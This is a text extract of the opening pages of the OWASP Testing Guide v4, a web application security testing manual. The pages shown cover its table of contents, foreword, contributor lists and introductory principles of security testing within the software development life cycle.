OWASP Ing Guide V4
OWASP%20ing%20Guide%20v4
OWASP_ing_Guide_v4
OWASP_ing_Guide_v4
OWASP_ing_Guide_v4
OWASP-ing-Guide-v4
User Manual: Pdf
Open the PDF directly: View PDF .
Page Count: 224
Download | |
Open PDF In Browser | View PDF |
1 Testing Guide 4.0 Project Leaders: Matteo Meucci and Andrew Muller Creative Commons (CC) Attribution Share-Alike Free version at http://www.owasp.org 2 THE ICONS BELOW REPRESENT WHAT OTHER VERSIONS ARE AVAILABLE IN PRINT FOR THIS BOOK TITLE. ALPHA: “Alpha Quality” book content is a working draft. Content is very rough and in development until the next level of publishing. BETA: “Beta Quality” book content is the next highest level. Content is still in development until the next publishing. RELEASE: “Release Quality” book content is the highest level of quality in a book title’s lifecycle, and is a final product. YOU ARE FREE: To Share - to copy, distribute and transmit the work To Remix - to adapt the work UNDER THE FOLLOWING CONDITIONS: Attribution. You must attribute the work in the manner specified by the author or licensor (but not in any way that suggests that they endorse you or your use of the work). Share Alike. If you alter, transform, or build upon this work, you may distribute the resulting work only under the same, similar or a compatible license. ALPHA BETA RELEASE The Open Web Application Security Project (OWASP) is a worldwide free and open community focused on improving the security of application software. Our mission is to make application security “visible”, so that people and organizations can make informed decisions about application security risks. Every one is free to participate in OWASP and all of our materials are available under a free and open software license. The OWASP Foundation is a 501c3 not-for-profit charitable organization that ensures the ongoing availability and support for our work. Testing Guide Foreword - Table of contents 3-4 5-6 0 Foreword by Eoin Keary 1 Frontispiece About the OWASP Testing Guide Project About The Open Web Application Security Project 7 - 21 2 Introduction The OWASP Testing Project Principles of Testing Testing Techniques Explained Deriving Security Test Requirements Security Tests Integrated in Development and Testing Workflows Security Test Data Analysis and Reporting 22 - 24 3 The OWASP Testing Framework Overview Phase 1: Before Development Begins Phase 2: During Definition and Design Phase 3: During Development Phase 4: During Deployment Phase 5: Maintenance and Operations A Typical SDLC Testing Workflow 25 - 207 4 Web Application Security Testing Introduction and Objectives Testing Checklist Information Gathering Conduct Search Engine Discovery and Reconnaissance for Information Leakage (OTG-INFO-001) Fingerprint Web Server (OTG-INFO-002) Review Webserver Metafiles for Information Leakage (OTG-INFO-003) Enumerate Applications on Webserver (OTG-INFO-004) Review Webpage Comments and Metadata for Information Leakage (OTG-INFO-005) Identify application entry points (OTG-INFO-006) Map execution paths through application (OTG-INFO-007) Fingerprint Web Application Framework (OTG-INFO-008) Fingerprint Web Application (OTG-INFO-009) Map Application Architecture (OTG-INFO-010) Configuration and Deployment Management Testing Test Network/Infrastructure Configuration (OTG-CONFIG-001) Test Application Platform Configuration (OTG-CONFIG-002) Testing Guide Foreword - Table of contents Test File Extensions Handling for Sensitive Information (OTG-CONFIG-003) Review Old, Backup and Unreferenced Files for Sensitive Information (OTG-CONFIG-004) Enumerate Infrastructure and Application Admin Interfaces (OTG-CONFIG-005) Test HTTP Methods (OTG-CONFIG-006) Test HTTP Strict Transport Security (OTG-CONFIG-007) Test RIA cross domain policy (OTG-CONFIG-008) Identity Management Testing Test Role Definitions (OTG-IDENT-001) Test User Registration Process (OTG-IDENT-002) Test Account Provisioning Process (OTG-IDENT-003) Testing for Account Enumeration and Guessable User Account (OTG-IDENT-004) Testing for Weak or unenforced username policy (OTG-IDENT-005) Authentication Testing Testing for Credentials Transported over an Encrypted Channel (OTG-AUTHN-001) Testing for default credentials (OTG-AUTHN-002) Testing for Weak lock out mechanism (OTG-AUTHN-003) Testing for bypassing authentication schema (OTG-AUTHN-004) Test remember password functionality (OTG-AUTHN-005) Testing for Browser cache weakness (OTG-AUTHN-006) Testing for Weak password policy (OTG-AUTHN-007) Testing for Weak security question/answer (OTG-AUTHN-008) Testing for weak password change or reset functionalities (OTG-AUTHN-009) Testing for Weaker authentication in alternative channel (OTG-AUTHN-010) Authorization Testing Testing Directory traversal/file include (OTG-AUTHZ-001) Testing for bypassing authorization schema (OTG-AUTHZ-002) Testing for Privilege Escalation (OTG-AUTHZ-003) Testing for Insecure Direct Object References (OTG-AUTHZ-004) Session Management Testing Testing for Bypassing Session Management Schema (OTG-SESS-001) Testing for Cookies attributes (OTG-SESS-002) Testing for Session Fixation (OTG-SESS-003) Testing for Exposed Session Variables (OTG-SESS-004) Testing for Cross Site Request Forgery (CSRF) (OTG-SESS-005) Testing for logout functionality (OTG-SESS-006) Test Session Timeout (OTG-SESS-007) Testing for Session puzzling (OTG-SESS-008) Input Validation Testing Testing for Reflected Cross Site Scripting (OTG-INPVAL-001) Testing for Stored Cross Site Scripting (OTG-INPVAL-002) Testing for HTTP Verb Tampering (OTG-INPVAL-003) Testing for HTTP Parameter pollution (OTG-INPVAL-004) Testing for SQL Injection (OTG-INPVAL-005) Oracle Testing MySQL Testing SQL Server Testing Testing PostgreSQL (from OWASP BSP) MS Access Testing 3 Testing Guide Foreword - Table of contents Testing for NoSQL injection Testing for LDAP Injection (OTG-INPVAL-006) Testing for ORM Injection (OTG-INPVAL-007) Testing for XML Injection (OTG-INPVAL-008) Testing for SSI Injection (OTG-INPVAL-009) Testing for XPath Injection (OTG-INPVAL-010) IMAP/SMTP Injection (OTG-INPVAL-011) Testing for Code Injection (OTG-INPVAL-012) Testing for Local File Inclusion Testing for Remote File Inclusion Testing for Command Injection (OTG-INPVAL-013) Testing for Buffer overflow (OTG-INPVAL-014) Testing for Heap overflow Testing for Stack overflow Testing for Format string Testing for incubated vulnerabilities (OTG-INPVAL-015) Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016) Testing for Error Handling Analysis of Error Codes (OTG-ERR-001) Analysis of Stack Traces (OTG-ERR-002) Testing for weak Cryptography Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection (OTG-CRYPST-001) Testing for Padding Oracle (OTG-CRYPST-002) Testing for Sensitive information sent via unencrypted channels (OTG-CRYPST-003) Business Logic Testing Test Business Logic Data Validation (OTG-BUSLOGIC-001) Test Ability to Forge Requests (OTG-BUSLOGIC-002) Test Integrity Checks (OTG-BUSLOGIC-003) Test for Process Timing (OTG-BUSLOGIC-004) Test Number of Times a Function Can be Used Limits (OTG-BUSLOGIC-005) Testing for the Circumvention of Work Flows (OTG-BUSLOGIC-006) Test Defenses Against Application Mis-use (OTG-BUSLOGIC-007) Test Upload of Unexpected File Types (OTG-BUSLOGIC-008) Test Upload of Malicious Files (OTG-BUSLOGIC-009) Client Side Testing Testing for DOM based Cross Site Scripting (OTG-CLIENT-001) Testing for JavaScript Execution (OTG-CLIENT-002) Testing for HTML Injection (OTG-CLIENT-003) Testing for Client Side URL Redirect (OTG-CLIENT-004) Testing for CSS Injection (OTG-CLIENT-005) Testing for Client Side Resource Manipulation (OTG-CLIENT-006) Test Cross Origin Resource Sharing (OTG-CLIENT-007) Testing for Cross Site Flashing (OTG-CLIENT-008) Testing for Clickjacking (OTG-CLIENT-009) Testing WebSockets (OTG-CLIENT-010) Test Web Messaging (OTG-CLIENT-011) Test Local Storage (OTG-CLIENT-012) 4 Testing Guide Foreword - Table of contents 208 - 222 5 Reporting Appendix A: Testing Tools Black Box Testing Tools Appendix B: Suggested Reading Whitepapers Books Useful Websites Appendix C: Fuzz Vectors Fuzz Categories Appendix D: Encoded Injection Input Encoding Output Encoding 5 Testing Guide Foreword - By Eoin Keary 0 Testing Guide Foreword The problem of insecure software is perhaps the most important technical challenge of our time. The dramatic rise of web applications enabling business, social networking etc has only compounded the requirements to establish a robust approach to writing and securing our Internet, Web Applications and Data. Foreword by Eoin Keary, OWASP Global Board The problem of insecure software is perhaps the most important technical challenge of our time. The dramatic rise of web applications enabling business, social networking etc has only compounded the requirements to establish a robust approach to writing and securing our Internet, Web Applications and Data. At The Open Web Application Security Project (OWASP), we’re trying to make the world a place where insecure software is the anomaly, not the norm. The OWASP Testing Guide has an important role to play in solving this serious issue. It is vitally important that our approach to testing software for security issues is based on the principles of engineering and science. We need a consistent, repeatable and defined approach to testing web applications. A world without some minimal standards in terms of engineering and technology is a world in chaos. It goes without saying that you can’t build a secure application without performing security testing on it. Testing is part of a wider approach to building a secure system. Many software development organizations do not include security testing as part of their standard software development process. What is even worse is that many security vendors deliver testing with varying degrees of quality and rigor. Security testing, by itself, isn’t a particularly good stand alone measure of how secure an application is, because there are an infinite number of ways that an attacker might be able to make an application break, and it simply isn’t possible to test them all. We can’t hack ourselves secure and we only have a limited time to test and defend where an attacker does not have such constraints. In conjunction with other OWASP projects such as the Code review Guide, the Development Guide and tools such as OWASP ZAP, this is a great start towards building and maintaining secure applications. The Development Guide will show your project how to architect and build a secure application, the Code Review Guide will tell you how to verify the security of your application’s source code, and this Testing Guide will show you how to verify the security of your running application. I highly recommend using these guides as part of your application security initiatives. Why OWASP? Creating a guide like this is a huge undertaking, requiring the expertise of hundreds of people around the world. There are many different ways to test for security flaws and this guide captures the consensus of the leading experts on how to perform this testing quickly, accurately, and efficiently. OWASP gives like minded security folks the ability to work together and form a leading practice approach to a security problem. The importance of having this guide available in a completely free and open way is important for the foundations mission. It gives anyone the ability to understand the techniques used to test for common security issues. Security should not be a black art or closed secret that only a few can practice. It should be open to all and not exclusive to security practitioners but also QA, Developers 6 Testing Guide Foreword - By Eoin Keary and Technical Managers. The project to build this guide keeps this expertise in the hands of the people who need it - you, me and anyone that is involved in building software. This guide must make its way into the hands of developers and software testers. There are not nearly enough application security experts in the world to make any significant dent in the overall problem. The initial responsibility for application security must fall on the shoulders of the developers, they write the code. It shouldn’t be a surprise that developers aren’t producing secure code if they’re not testing for it or consider the types of bugs which introduce vulnerability. Keeping this information up to date is a critical aspect of this guide project. By adopting the wiki approach, the OWASP community can evolve and expand the information in this guide to keep pace with the fast moving application security threat landscape. This Guide is a great testament to the passion and energy our members and project volunteers have for this subject. It shall certainly help change the world a line of code at a time. Tailoring and Prioritizing You should adopt this guide in your organization. You may need to tailor the information to match your organization’s technologies, processes, and organizational structure. In general there are several different roles within organizations that may use this guide: • Developers should use this guide to ensure that they are producing secure code. These tests should be a part of normal code and unit testing procedures. • Software testers and QA should use this guide to expand the set of test cases they apply to applications. Catching these vulnerabilities early saves considerable time and effort later. • Security specialists should use this guide in combination with other techniques as one way to verify that no security holes have been missed in an application. • Project Managers should consider the reason this guide exists and that security issues are manifested via bugs in code and design. The most important thing to remember when performing security testing is to continuously re-prioritize. There are an infinite number of possible ways that an application could fail, and organizations always have limited testing time and resources. Be sure time and resources are spent wisely. Try to focus on the security holes that are a real risk to your business. Try to contextualize risk in terms of the application and its use cases. This guide is best viewed as a set of techniques that you can use to find different types of security holes. But not all the techniques are equally important. Try to avoid using the guide as a checklist, new vulnerabilities are always manifesting and no guide can be an exhaustive list of “things to test for”, but rather a great place to start. The Role of Automated Tools There are a number of companies selling automated security analysis and testing tools. Remember the limitations of these tools so that you can use them for what they’re good at. As Michael Howard put it at the 2006 OWASP AppSec Conference in Seattle, “Tools do not make software secure! They help scale the process and help enforce policy.” Most importantly, these tools are generic - meaning that they are not designed for your custom code, but for applications in general. That means that while they can find some generic problems, they do not have enough knowledge of your application to allow them to detect most flaws. In my experience, the most serious security issues are the ones that are not generic, but deeply intertwined in your business logic and custom application design. These tools can also be seductive, since they do find lots of potential issues. While running the tools doesn’t take much time, each one of the potential problems takes time to investigate and verify. If the goal is to find and eliminate the most serious flaws as quickly as possible, consider whether your time is best spent with automated tools or with the techniques described in this guide. Still, these tools are certainly part of a well-balanced application security program. Used wisely, they can support your overall processes to produce more secure code. Call to Action If you’re building, designing or testing software, I strongly encourage you to get familiar with the security testing guidance in this document. It is a great road map for testing the most common issues facing applications today, but it is not exhaustive. If you find errors, please add a note to the discussion page or make the change yourself. You’ll be helping thousands of others who use this guide. Please consider joining us as an individual or corporate member so that we can continue to produce materials like this testing guide and all the other great projects at OWASP. Thank you to all the past and future contributors to this guide, your work will help to make applications worldwide more secure. Eoin Keary, OWASP Board Member, April 19, 2013 7 Testing Guide Frontispiece 1 Testing Guide Frontispiece “Open and collaborative knowledge: that is the OWASP way.” With V4 we realized a new guide that will be the standard de-facto guide to perform Web Application Penetration Testing “Open and collaborative knowledge: that is the OWASP way.” With V4 we realized a new guide that will be the standard de-facto guide to perform Web Application Penetration Testing. - Matteo Meucci OWASP thanks the many authors, reviewers, and editors for their hard work in bringing this guide to where it is today. If you have any comments or suggestions on the Testing Guide, please e-mail the Testing Guide mail list: http://lists.owasp.org/mailman/listinfo/owasp-testing Or drop an e-mail to the project leaders: Andrew Muller and Matteo Meucci Revision History The Testing Guide v4 will be released in 2014. The Testing guide originated in 2003 with Dan Cuthbert as one of the original editors. It was handed over to Eoin Keary in 2005 and transformed into a wiki. Matteo Meucci has taken on the Testing guide and is now the lead of the OWASP Testing Guide Project. From 2012 Andrew Muller co-leadership the project with Matteo Meucci. 2014 • “OWASP Testing Guide”, Version 4.0 15th September, 2008 • “OWASP Testing Guide”, Version 3.0 December 25, 2006 • “OWASP Testing Guide”, Version 2.0 Version 4.0 July 14, 2004 • “OWASP Web Application Penetration Checklist”, Version 1.1 [1] This version of the Testing Guide integrates with the two other flagship OWASP documentation products: the Developers Guide and the Code Review Guide. To achieve this we aligned the testing categories and test numbering with those in other OWASP products. The aim of the Testing and Code Review Guides is to evaluate the security controls described by the Developers Guide. December 2004 • “The OWASP Testing Guide”, Version 1.0 The OWASP Testing Guide version 4 improves on version 3 in three ways: Project Leaders [2] All chapters have been improved and test cases expanded to 87 (64 test cases in v3) including the introduction of four new chapters and controls: • Identity Management Testing • Error Handling • Cryptography • Client Side Testing [3] This version of the Testing Guide encourages the community not to simply accept the test cases outlined in this guide. We encourage security testers to integrate with other software testers and devise test cases specific to the target application. As we find test cases that have wider applicability we encourage the security testing community to share them and contribute them to the Testing Guide. This will continue to build the application security body of knowledge and allow the development of the Testing Guide to be an iterative rather than monolithic process. Copyright and License Copyright (c) 2014 The OWASP Foundation. This document is released under the Creative Commons 2.5 License. Please read and understand the license and copyright conditions. Matteo Meucci Andrew Muller Andrew Muller: OWASP Testing Guide Lead since 2013. Matteo Meucci: OWASP Testing Guide Lead since 2007. Eoin Keary: OWASP Testing Guide 2005-2007 Lead. Daniel Cuthbert: OWASP Testing Guide 2003-2005 Lead. 8 Testing Guide Frontispiece v4 Authors • Matteo Meucci • Pavol Luptak • Marco Morana • Giorgio Fedon • Stefano Di Paola • Gianrico Ingrosso • Giuseppe Bonfà • Andrew Muller • Robert Winkel • Roberto Suggi Liverani • Robert Smith • Tripurari Rai v4 Reviewers • Davide Danelon • Andrea Rosignoli • Irene Abezgauz • Lode Vanstechelman • Sebastien Gioria • Yiannis Pavlosoglou • Aditya Balapure v2 Authors • Vicente Aguilera • Mauro Bregolin • Tom Brennan • Gary Burns • Luca Carettoni • Dan Cornell • Mark Curphey • Daniel Cuthbert • Sebastien Deleersnyder • Stephen DeVries v2 Reviewers • Vicente Aguilera • Marco Belotti • Mauro Bregolin • Marco Cova • Daniel Cuthbert • Paul Davies • Stefano Di Paola • Matteo G.P. Flora • Simona Forti • Darrell Groundy • Thomas Ryan • Tim Bertels • Cecil Su • Aung KhAnt • Norbert Szetei • Michael Boman • Wagner Elias • Kevin Horvat • Tom Brennan • Tomas Zatko • Juan Galiana Lara • Sumit Siddharth • Mike Hryekewicz • Simon Bennetts • Ray Schippers • Raul Siles • Jayanta Karmakar • Brad Causey • Vicente Aguilera • Ismael Gonçalves • David Fern • Tom Eston • Kevin Horvath • Rick Mitchell v3 Authors • Anurag Agarwwal • Daniele Bellucci • Ariel Coronel • Stefano Di Paola • Giorgio Fedon • Adam Goodman • Christian Heinrich • Kevin Horvath • Gianrico Ingrosso • Roberto Suggi Liverani • Kuza55 • Pavol Luptak • Ferruh Mavituna • Marco Mella • Matteo Meucci • Marco Morana • Antonio Parata • Cecil Su • Harish Skanda Sureddy • Mark Roxberry • Andrew Van der Stock • Stefano Di Paola • David Endler • Giorgio Fedon • Javier Fernández-Sanguino • Glyn Geoghegan • Stan Guzik • Madhura Halasgikar • Eoin Keary • David Litchfield • Andrea Lombardini • Eoin Keary • James Kist • Katie McDowell • Marco Mella • Matteo Meucci • Syed Mohamed • Antonio Parata • Alberto Revelli • Mark Roxberry • Dave Wichers • Ralph M. Los • Claudio Merloni • Matteo Meucci • Marco Morana • Laura Nunez • Gunter Ollmann • Antonio Parata • Yiannis Pavlosoglou • Carlo Pelliccioni • Harinath Pudipeddi • Eduardo Castellanos • Simone Onofri • Harword Sheen • Amro AlOlaqi • Suhas Desai • Ryan Dewhurst • Zaki Akhmad • Davide Danelon • Alexander Antukh • Thomas Kalamaris • Alexander Vavousis • Christian Heinrich • Babu Arokiadas • Rob Barnes • Ben Walther • Anant Shrivastava • Colin Watson • Luca Carettoni • Eoin Keary • Jeff Williams • Juan Manuel Bahamonde • Thomas Skora • Irene Abezgauz • Hugo Costa v3 Reviewers • Marco Cova • Kevin Fuller • Matteo Meucci • Nam Nguyen • Rick Mitchell • Alberto Revelli • Mark Roxberry • Tom Ryan • Anush Shetty • Larry Shields • Dafydd Studdard • Andrew van der Stock • Ariel Waissbein • Jeff Williams • Tushar Vartak Trademarks • Java, Java Web Server, and JSP are registered trademarks of Sun Microsystems, Inc. • Merriam-Webster is a trademark of Merriam-Webster, Inc. • Microsoft is a registered trademark of Microsoft Corporation. • Octave is a service mark of Carnegie Mellon University. • VeriSign and Thawte are registered trademarks of VeriSign, Inc. • Visa is a registered trademark of VISA USA. • OWASP is a registered trademark of the OWASP Foundation All other products and company names may be trademarks of their respective owners. Use of a term in this document should not be regarded as affecting the validity of any trademark or service mark. 9 Testing Guide Introduction 2 The OWASP Testing Project The OWASP Testing Project has been in development for many years. The aim of the project is to help people understand the what, why, when, where, and how of testing web applications. Writing the Testing Guide has proven to be a difficult task. It was a challenge to obtain consensus and develop content that allowed people to apply the concepts described in the guide, while also enabling them to work in their own environment and culture. It was also a challenge to change the focus of web application testing from penetration testing to testing integrated in the software development life cycle. However, the group is very satisfied with the results of the project. Many industry experts and security professionals, some of whom are responsible for software security at some of the largest companies in the world, are validating the testing framework. This framework helps organizations test their web applications in order to build reliable and secure software. The framework does not simply highlighting areas of weakness, although the latter is certainly a by product of many of the OWASP guides and checklists. As such, hard decisions had top be made about the appropriateness of certain testing techniques and technologies. The group fully understands that not everyone will agree upon all of these decisions. However, OWASP is able to take the high ground and change culture over time through awareness and education based on consensus and experience. The rest of this guide is organized as follows: This introduction covers the pre-requisites of testing web applications and the scope of testing. It also covers the principles of successful testing and testing techniques. Chapter 3 presents the OWASP Testing Framework and explains its techniques and tasks in relation to the various phases of the software development life cycle. Chapter 4 covers how to test for specific vulnerabilities (e.g., SQL Injection) by code inspection and penetration testing. Measuring Security: the Economics of Insecure Software A basic tenet of software engineering is that you can’t control what you can’t measure [1]. Security testing is no different. Unfortunately, measuring security is a notoriously difficult process. This topic will not be covered in detail here, as it would take a guide on its own (for an introduction, see [2]). One aspect that should be emphasized is that security measurements are about both the specific technical issues (e.g., how prevalent a certain vulnerability is) and how these issues affect the economics of software. Most technical people will at least understand the basic issues, or they may have a deeper understanding of the vulnerabilities. Sadly, few are able to translate that technical knowledge into monetary terms and quantify the potential cost of vulnerabilities to the application owner’s business. Until this happens, CIOs will not be able to develop an accurate return on security investment and, subsequently, assign appropriate budgets for software security. While estimating the cost of insecure software may appear a daunting task, there has been a significant amount of work in this direction. 11 For example, in June 2002, the US National Institute of Standards (NIST) published a survey on the cost of insecure software to the US economy due to inadequate software testing [3]. Interestingly, they estimate that a better testing infrastructure would save more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security have been studied by academic researchers. See [4] for more information about some of these efforts. While estimating the cost of insecure software may appear a daunting task, there has been a significant amount of work in this direction. For example, in June 2002, the US National Institute of Standards (NIST) published a survey on the cost of insecure software to the US economy due to inadequate software testing [3]. Interestingly, they estimate that a better testing infrastructure would save more than a third of these costs, or about $22 billion a year. More recently, the links between economics and security have been studied by academic researchers. See [4] for more information about some of these efforts. The framework described in this document encourages people to measure security throughout the entire development process. They can then relate the cost of insecure software to the impact it has on the business, and consequently develop appropriate business processes and assign resources to manage the risk. Remember that measuring and testing web applications is even more critical than for other software, since web applications are exposed to millions of users through the Internet. What is Testing? During the development life cycle of a web application many things need to be tested, but what does testing actually mean? The Merriam-Webster Dictionary describes testing as: • To put to test or proof. • To undergo a test. • To be assigned a standing or evaluation based on tests. For the purposes of this document testing is a process of comparing the state of a system or application against a set of criteria. In the security industry people frequently test against a set of mental criteria that are neither well defined nor complete. As a result of this, many outsiders regard security testing as a black art. The aim of this document is to change that perception and to make it easier for people without in-depth security knowledge to make a difference in testing. Why Perform Testing? This document is designed to help organizations understand what comprises a testing program, and to help them identify the steps that need to be undertaken to build and operate a testing program on web applications. The guide gives a broad view of the elements required to 10 Testing Guide Introduction make a comprehensive web application security program. This guide can be used as a reference guide and as a methodology to help determine the gap between existing practices and industry best practices. This guide allows organizations to compare themselves against industry peers, to understand the magnitude of resources required to test and maintain software, or to prepare for an audit. This chapter does not go into the technical details of how to test an application, as the intent is to provide a typical security organizational framework. The technical details about how to test an application, as part of a penetration test or code review, will be covered in the remaining parts of this document. When to Test? Most people today don’t test software until it has already been created and is in the deployment phase of its life cycle (i.e., code has been created and instantiated into a working web application). This is generally a very ineffective and cost-prohibitive practice. One of the best methods to prevent security bugs from appearing in production applications is to improve the Software Development Life Cycle (SDLC) by including security in each of its phases. An SDLC is a structure imposed on the development of software artefacts. If an SDLC is not currently being used in your environment, it is time to pick one! The following figure shows a generic SDLC model as well as the (estimated) increasing cost of fixing security bugs in such a model. DE SIG NE FI DEV ELOP INTAIN A M N DE Figure 1: Generic SDLC Model DEPLOY Companies should inspect their overall SDLC to ensure that security is an integral part of the development process. SDLCs should include security tests to ensure security is adequately covered and controls are effective throughout the development process. What to Test? It can be helpful to think of software development as a combination of people, process, and technology. If these are the factors that “create” software, then it is logical that these are the factors that must be test- ed. Today most people generally test the technology or the software itself. An effective testing program should have components that test: People – to ensure that there is adequate education and awareness; Process – to ensure that there are adequate policies and standards and that people know how to follow these policies; Technology – to ensure that the process has been effective in its implementation. Unless a holistic approach is adopted, testing just the technical implementation of an application will not uncover management or operational vulnerabilities that could be present. By testing the people, policies, and processes, an organization can catch issues that would later manifest themselves into defects in the technology, thus eradicating bugs early and identifying the root causes of defects. Likewise, testing only some of the technical issues that can be present in a system will result in an incomplete and inaccurate security posture assessment. Denis Verdon, Head of Information Security at Fidelity National Financial presented an excellent analogy for this misconception at the OWASP AppSec 2004 Conference in New York [5]: “If cars were built like applications [...] safety tests would assume frontal impact only. Cars would not be roll tested, or tested for stability in emergency maneuvers, brake effectiveness, side impact, and resistance to theft.” Feedback and Comments As with all OWASP projects, we welcome comments and feedback. We especially like to know that our work is being used and that it is effective and accurate. There are some common misconceptions when developing a testing methodology to find security bugs in software. This chapter covers some of the basic principles that professionals should take into account when performing security tests on software. Principles of Testing There is No Silver Bullet While it is tempting to think that a security scanner or application firewall will provide many defenses against attack or identify a multitude of problems, in reality there is no silver bullet to the problem of insecure software. Application security assessment software, while useful as a first pass to find low-hanging fruit, is generally immature and ineffective at in-depth assessments or providing adequate test coverage. Remember that security is a process and not a product. Think Strategically, Not Tactically Over the last few years, security professionals have come to realize the fallacy of the patch-and-penetrate model that was pervasive in information security during the 1990’s. The patch-and-penetrate model involves fixing a reported bug, but without proper investigation of the root cause. This model is usually associated with the window of vulnerability shown in the figure below. The evolution of vulnerabilities in common software used worldwide has shown the ineffectiveness of this model. For more information about the window of vulnerability please refer to [6]. Vulnerability studies [7] have shown that with the reaction time of attackers worldwide, the typical window of vulnerability does not pro12 11 Testing Guide Introduction vide enough time for patch installation, since the time between a vulnerability being uncovered and an automated attack against it being developed and released is decreasing every year. There are several incorrect assumptions in the patch-and-penetrate model. Many users believe that patches interfere with normal operations and might break existing applications. It is also incorrect to assume that all users are aware of newly released patches. Consequently not all users of a product will apply patches, either because they think patching may interfere with how the software works or be- phases may change depending on the SDLC model used by an organization, each conceptual phase of the archetype SDLC will be used to develop the application (i.e., define, design, develop, deploy, maintain). Each phase has security considerations that should become part of the existing process, to ensure a cost-effective and comprehensive security program. There are several secure SDLC frameworks that exist that provide both descriptive and prescriptive advice. Whether a person takes descriptive or prescriptive advice depends on the maturity of the SDLC Figure 2: Window of Vulnerability Vulerability is know to the vendor A security vulerability is discovered The vendor notifies it’s clients (sometimes) Vulerability is made pubic Risk Level Securtity tools are udpdated (IDS signatures, new modules for VA tools) A patch is published The existence of the patch is widely known The patch is installed in all systems affected Time cause they lack knowledge about the existence of the patch. It is essential to build security into the Software Development Life Cycle (SDLC) to prevent reoccurring security problems within an application. Developers can build security into the SDLC by developing standards, policies, and guidelines that fit and work within the development methodology. Threat modeling and other techniques should be used to help assign appropriate resources to those parts of a system that are most at risk. The SDLC is King The SDLC is a process that is well-known to developers. By integrating security into each phase of the SDLC, it allows for a holistic approach to application security that leverages the procedures already in place within the organization. Be aware that while the names of the various process. Essentially, prescriptive advice shows how the secure SDLC should work, and descriptive advice shows how its used in the real world. Both have their place. For example, if you don’t know where to start, a prescriptive framework can provide a menu of potential security controls that can be applied within the SDLC. Descriptive advice can then help drive the decision process by presenting what has worked well for other organizations. Descriptive secure SDLCs include BSIMM-V; and the prescriptive secure SDLCs inculde OWASP’s Open Software Assurance Maturity Model (OpenSAMM) and ISO/IEC 27034 Parts 1-8, parts of which are still in development. Test Early and Test Often When a bug is detected early within the SDLC it can be addressed faster and at a lower cost. A security bug is no different from a functional 12 Testing Guide Introduction or performance-based bug in this regard. A key step in making this possible is to educate the development and QA teams about common security issues and the ways to detect and prevent them. Although new libraries, tools, or languages can help design better programs (with fewer security bugs), new threats arise constantly and developers must be aware of the threats that affect the software they are developing. Education in security testing also helps developers acquire the appropriate mindset to test an application from an attacker’s perspective. This allows each organization to consider security issues as part of their existing responsibilities. Understand the Scope of Security It is important to know how much security a given project will require. The information and assets that are to be protected should be given a classification that states how they are to be handled (e.g., confidential, secret, top secret). Discussions should occur with legal council to ensure that any specific security requirements will be met. In the USA requirements might come from federal regulations, such as the Gramm-Leach-Bliley Act [8], or from state laws, such as the California SB-1386 [9]. For organizations based in EU countries, both country-specific regulation and EU Directives may apply. For example, Directive 96/46/EC4 [10] makes it mandatory to treat personal data in applications with due care, whatever the application. Develop the Right Mindset Successfully testing an application for security vulnerabilities requires thinking “outside of the box.” Normal use cases will test the normal behavior of the application when a user is using it in the manner that is expected. Good security testing requires going beyond what is expected and thinking like an attacker who is trying to break the application. Creative thinking can help to determine what unexpected data may cause an application to fail in an insecure manner. It can also help find what assumptions made by web developers are not always true and how they can be subverted. One of the reasons why automated tools are actually bad at automatically testing for vulnerabilities is that this creative thinking must be done on a case-by-case basis as most web applications are being developed in a unique way (even when using common frameworks). Understand the Subject One of the first major initiatives in any good security program should be to require accurate documentation of the application. The architecture, data-flow diagrams, use cases, etc, should be written in formal documents and made available for review. The technical specification and application documents should include information that lists not only the desired use cases, but also any specifically disallowed use case. Finally, it is good to have at least a basic security infrastructure that allows the monitoring and trending of attacks against an organization’s applications and network (e.g., IDS systems). Use the Right Tools While we have already stated that there is no silver bullet tool, tools do play a critical role in the overall security program. There is a range of open source and commercial tools that can automate many routine security tasks. These tools can simplify and speed up the security process by assisting security personnel in their tasks. However, it is important to understand exactly what these tools can and cannot do so that they are not oversold or used incorrectly. The Devil is in the Details It is critical not to perform a superficial security review of an applica- tion and consider it complete. This will instill a false sense of confidence that can be as dangerous as not having done a security review in the first place. It is vital to carefully review the findings and weed out any false positive that may remain in the report. Reporting an incorrect security finding can often undermine the valid message of the rest of a security report. Care should be taken to verify that every possible section of application logic has been tested, and that every use case scenario was explored for possible vulnerabilities. Use Source Code When Available While black box penetration test results can be impressive and useful to demonstrate how vulnerabilities are exposed in a production environment, they are not the most effective or efficient way to secure an application. It is difficult for dynamic testing to test the entire code base, particularly if many nested conditional statements exist. If the source code for the application is available, it should be given to the security staff to assist them while performing their review. It is possible to discover vulnerabilities within the application source that would be missed during a black box engagement. Develop Metrics An important part of a good security program is the ability to determine if things are getting better. It is important to track the results of testing engagements, and develop metrics that will reveal the application security trends within the organization. Good metrics will show: • If more education and training are required; • If there is a particular security mechanism that is not clearly understood by the development team; • If the total number of security related problems being found each month is going down. Consistent metrics that can be generated in an automated way from available source code will also help the organization in assessing the effectiveness of mechanisms introduced to reduce security bugs in software development. Metrics are not easily developed, so using standard metrics like those provided by the OWASP Metrics project and other organizations is a good starting point. Document the Test Results To conclude the testing process, it is important to produce a formal record of what testing actions were taken, by whom, when they were performed, and details of the test findings. It is wise to agree on an acceptable format for the report which is useful to all concerned parties, which may include developers, project management, business owners, IT department, audit, and compliance. The report should be clear to the business owner in identifying where material risks exist and sufficient to get their backing for subsequent mitigation actions. The report should also be clear to the developer in pin-pointing the exact function that is affected by the vulnerability and associated recommendations for resolving issues in a language that the developer will understand. The report should also allow another security tester to reproduce the results. Writing the report should not be overly burdensome on the security tester themselves. Security testers are not generally renowned for their creative writing skills and agreeing on a complex report can lead to instances where test results do not get properly documented. Using a security test report template can save time and ensure that results are documented accurately and consistently, and are in a format that is suitable for the audience. 13 Testing Guide Introduction Testing Techniques Explained This section presents a high-level overview of various testing techniques that can be employed when building a testing program. It does not present specific methodologies for these techniques as this information is covered in Chapter 3. This section is included to provide context for the framework presented in the next chapter and to highlight the advantages and disadvantages of some of the techniques that should be considered. In particular, we will cover: • Manual Inspections & Reviews • Threat Modeling • Code Review • Penetration Testing Manual Inspections & Reviews Overview Manual inspections are human reviews that typically test the security implications of people, policies, and processes. Manual inspections can also include inspection of technology decisions such as architectural designs. They are usually conducted by analyzing documentation or performing interviews with the designers or system owners. While the concept of manual inspections and human reviews is simple, they can be among the most powerful and effective techniques available. By asking someone how something works and why it was implemented in a specific way, the tester can quickly determine if any security concerns are likely to be evident. Manual inspections and reviews are one of the few ways 